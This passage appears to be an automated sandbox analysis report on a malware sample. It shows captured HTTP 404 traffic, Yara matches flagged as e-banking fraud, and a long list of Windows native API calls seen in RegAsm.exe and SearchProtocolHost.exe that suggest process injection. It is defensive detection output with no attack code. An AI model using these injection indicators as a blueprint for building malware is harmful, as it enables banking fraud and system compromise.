44 77 50 32 38 5a 64 34 34 71 33 6a 75 48 4f 76 44 6f 62 5f 51 5f 76 77 35 54 76 70 30 58 71 6e 67 77 5f 35 35 50 43 4b 7a 56 35 69 56 77 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 
68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 02 Dec 2024 14:54:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2BCC2A97F9F43961E187F1AC0958ABE28EA76C523C0358318228E2AB9100Set-Cookie: _csrf=e32ce2e337cdafab5262e81f972d0561a8e5600416a6b35fc1ac9c8403676b34a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22ZzJmC4xPaoXs4fYl7Cmw8mILafOQwnch%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 67 76 6c 37 61 66 6c 57 41 6a 66 55 59 69 53 4d 49 44 6c 6e 59 67 35 74 55 75 43 39 64 36 4b 56 35 42 4f 67 67 37 5f 44 4b 6d 66 59 67 7a 45 45 75 6d 4a 36 5a 37 55 4e 66 50 38 55 58 7a 34 4f 4f 53 34 5f 6c 34 55 61 36 39 6d 46 64 65 5f 53 79 4b 31 4a 44 77 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 
68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 02 Dec 2024 14:54:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2BEB43DAAEC668390AC153CCDDD6DBC7205EACFB43E5DF8D5961B1191300Set-Cookie: _csrf=ccd8c6a513d00a64832473e71c5e1bc379d4f2fa5e9474d042d5bf6e74078e07a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%228gWEDL94uI6FbE5LMScuy2GFdUSR_4lh%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 63 39 32 61 5a 73 56 6f 77 4f 41 71 6c 43 46 73 6d 42 67 30 73 44 49 47 4f 79 46 48 6a 67 4f 30 48 49 6b 33 58 37 62 4f 5a 57 74 4c 75 73 30 6a 67 53 54 35 31 46 5f 64 46 79 72 36 58 51 48 38 66 31 56 59 56 44 36 38 52 50 4a 34 33 47 51 4e 36 66 6f 4a 41 77 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 
68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="

                E-Banking Fraud

                Source: Yara match; File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000004.00000002.1809895611.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.2673360486.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.2673479877.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.1811075561.0000000002F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000005.00000002.2673831486.00000000023A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Windows\System32\wscript.exe; COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
                Source: C:\Windows\System32\wscript.exe; COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_0042CE33 NtClose
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C635C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62B60 NtClose,LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62C70 NtFreeVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C64340 NtSetContextThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C63090 NtSetValueKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C63010 NtOpenDirectoryObject
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C64650 NtSuspendThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62AD0 NtReadFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62AF0 NtWriteFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62AB0 NtWaitForSingleObject
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62BE0 NtQueryValueKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62BF0 NtAllocateVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62B80 NtQueryInformationFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62BA0 NtEnumerateValueKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C639B0 NtGetContextThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62EE0 NtQueueApcThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62E80 NtReadVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62E30 NtWriteVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62FE0 NtCreateFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62F90 NtProtectVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62FA0 NtQuerySection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62FB0 NtResumeThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62F60 NtCreateProcessEx
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62F30 NtCreateSection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62CC0 NtQueryVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62CF0 NtOpenProcess
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62CA0 NtQueryInformationToken
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62C60 NtCreateKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62C00 NtQueryInformationProcess
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62DD0 NtDelayExecution
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62DB0 NtEnumerateKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C63D70 NtOpenThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62D00 NtSetInformationFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62D10 NtMapViewOfSection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C63D10 NtOpenProcessToken
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C62D30 NtUnmapViewOfSection
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B4340 NtSetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B4650 NtSuspendThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B35C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2B60 NtClose,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2BA0 NtEnumerateValueKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2BE0 NtQueryValueKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2AF0 NtWriteFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2AD0 NtReadFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B39B0 NtGetContextThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2F30 NtCreateSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2FB0 NtResumeThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2FE0 NtCreateFile,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2E80 NtReadVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2EE0 NtQueueApcThread,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2D30 NtUnmapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2D10 NtMapViewOfSection,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2DD0 NtDelayExecution,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2C70 NtFreeVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2C60 NtCreateKey,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2CA0 NtQueryInformationToken,LdrInitializeThunk
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B3010 NtOpenDirectoryObject
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B3090 NtSetValueKey
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2B80 NtQueryInformationFile
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2AB0 NtWaitForSingleObject
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2F60 NtCreateProcessEx
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2FA0 NtQuerySection
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2F90 NtProtectVirtualMemory
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2E30 NtWriteVirtualMemory
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B3D10 NtOpenProcessToken
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2D00 NtSetInformationFile
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B3D70 NtOpenThread
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2DB0 NtEnumerateKey
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2C00 NtQueryInformationProcess
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2CF0 NtOpenProcess
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_033B2CC0 NtQueryVirtualMemory
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_02C296C0 NtCreateFile
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_02C29B10 NtAllocateVirtualMemory
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_02C29820 NtReadFile
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_02C299B0 NtClose
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_02C29910 NtDeleteFile
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe; Code function: 6_2_0323F899 NtMapViewOfSection
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe; Code function: 2_2_01460D98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_00418DC3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_0040E810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_0040E813
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_00410833
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_0040E957
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_0040E963
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_0040290C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_00402910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_00403200
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_0042F443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_00402640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_00410613
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_00402633
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_00416F7D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_00416FC3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_00416FBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C4B2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02CD12ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C352A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02CD0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02CF03E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C3E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C7739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C1D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02CEA352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02CE132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02CDF0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C370C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02CE70E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02CEF0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02CE81CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02CF01AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C3B1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02CFB16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C6516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C1F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C20100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02CCA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02CE16CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C4C6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C2C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02CEF7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C54750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C30770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02CDE4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02CE2446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C21460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02CEF43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02CF0591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02CCD5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02CE7571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C30535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02CDDAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C2EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02CCDAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 4_2_02C75AA0
